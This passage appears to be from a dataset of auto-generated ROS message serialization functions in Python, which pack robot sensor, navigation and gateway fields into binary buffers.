_x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v44 = val2.icon\n _x = _v44.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v44.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v44.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = 
len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.gone)\n buff.write(_struct_I.pack(length))\n for val1 in self.gone:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v45 = val1.platform_info\n _x = _v45.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v45.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v45.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v46 = _v45.icon\n _x = _v46.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v46.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v46.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v45.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v47 = val1.conn_stats\n _x = _v47\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n 
_x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v48 = val2.icon\n _x = _v48.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v48.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v48.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_9B.pack(_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, 
_x.water_sts))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs))\n _x = self.Header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2hHBI().pack(_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.Class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2B6f2Bb().pack(_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Front_sens.ID, _x.Front_sens.timestamp))\n buff.write(self.Front_sens.compass.tostring())\n buff.write(self.Front_sens.gyro.tostring())\n buff.write(self.Front_sens.accel.tostring())\n buff.write(self.Front_sens.fusionPose.tostring())\n buff.write(self.Front_sens.fusionQPose.tostring())\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Rear_sens.ID, _x.Rear_sens.timestamp))\n buff.write(self.Rear_sens.compass.tostring())\n buff.write(self.Rear_sens.gyro.tostring())\n buff.write(self.Rear_sens.accel.tostring())\n buff.write(self.Rear_sens.fusionPose.tostring())\n buff.write(self.Rear_sens.fusionQPose.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = 
_x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(self.battery_voltage))\n _x = self.flight_mode_ll\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.state_estimation\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.position_control\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B2f.pack(_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load))\n _x = self.motor_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.gps_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_iBf.pack(_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset))\n buff.write(self.rc_channel.tostring())\n buff.write(self.control_axes.tostring())\n length = len(self.control_buttons)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.control_buttons.tostring())\n _x = self\n buff.write(_struct_6d.pack(_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3B4IH3B.pack(_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d2H9d5fdI().pack(_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_4i.pack(_x.FL_vel, _x.FR_vel, _x.BL_vel, _x.BR_vel))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: 
'%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_12d().pack(_x.sensor_pose_on_robot.position.x, _x.sensor_pose_on_robot.position.y, _x.sensor_pose_on_robot.position.z, _x.sensor_pose_on_robot.orientation.x, _x.sensor_pose_on_robot.orientation.y, _x.sensor_pose_on_robot.orientation.z, _x.sensor_pose_on_robot.orientation.w, _x.min_sensor_distance, _x.max_sensor_distance, _x.sensor_std_range, _x.sensor_std_yaw, _x.sensor_std_pitch))\n length = len(self.sensed_data)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_data:\n _x = val1\n buff.write(_get_struct_3di().pack(_x.range, _x.yaw, _x.pitch, _x.id))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_H6B5f2Bf.pack(_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_2H().pack(_x.image_width, _x.image_height))\n length = len(self.Hlines)\n buff.write(_struct_I.pack(length))\n for val1 in self.Hlines:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.Vlines)\n buff.write(_struct_I.pack(length))\n for val1 in self.Vlines:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n buff.write(_get_struct_H().pack(self.PFPS))\n length = len(self.regions)\n buff.write(_struct_I.pack(length))\n for val1 in self.regions:\n _v5 = val1.color\n _x = _v5\n buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a))\n _v6 = val1.moment\n _x = _v6\n buff.write(_get_struct_10f().pack(_x.m00, _x.m10, _x.m01, _x.m11, _x.m20, _x.m02, _x.m21, _x.m12, _x.m30, _x.m03))\n _x = self\n buff.write(_get_struct_2H().pack(_x.box_width, _x.box_height))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), 
str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2q3d3q().pack(_x.max_features, _x.window_size, _x.quality, _x.min_distance, _x.harris, _x.size_block, _x.pyramid_lvl, _x.mask_border))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.vehicle_id.id))\n _x = self.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage))\n _x = self.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_I2di6h8fI().pack(_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, 
_x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _serialize_buffer(buffer, array_serialization=None):\n if array_serialization == 'binary':\n # WARNING: in NumPy 1.9, tostring() has been renamed to tobytes()\n # but tostring() is still here for now for backward compatibility.\n return buffer.ravel().tostring()\n elif array_serialization == 'base64':\n return {'storage_type': 'base64',\n 'buffer': base64.b64encode(buffer).decode('ascii')\n }\n raise ValueError(\"The array serialization method should be 'binary' or \"\n \"'base64'.\")", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.actors)\n buff.write(_struct_I.pack(length))\n for val1 in self.actors:\n _v17 = val1.header\n _x = _v17.seq\n buff.write(_get_struct_I().pack(_x))\n _v18 = _v17.stamp\n _x = _v18\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v17.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.tracking_id\n buff.write(_get_struct_I().pack(_x))\n _v19 = val1.pose\n _v20 = _v19.pose\n _v21 = _v20.position\n _x = _v21\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v22 = _v20.orientation\n _x = _v22\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n buff.write(_v19.covariance.tostring())\n if len(val1.points) != 18:\n self._check_types(ValueError(\"Expecting %s items but found %s when writing '%s'\" % (18, len(val1.points), 'val1.points')))\n for val2 in val1.points:\n _v23 = val2.point\n _x = _v23\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = val2.confidence\n buff.write(_get_struct_f().pack(_x))\n _v24 = val1.nose_point\n _x = _v24\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_B4bB.pack(_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(self.Rscanpose.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def 
serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.type_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_4f.pack(_x.home.latitude, _x.home.longitude, _x.home.altitude, _x.home.heading))\n length = len(self.movements)\n buff.write(_struct_I.pack(length))\n for val1 in self.movements:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_b.pack(val1.type))\n length = len(val1.pre_actions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.pre_actions:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_b.pack(val2.type))\n _x = val2.action_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.slot_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.receivers_name)\n buff.write(_struct_I.pack(length))\n for val3 in val2.receivers_name:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n length = len(val1.post_actions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.post_actions:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_b.pack(val2.type))\n _x = val2.action_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == 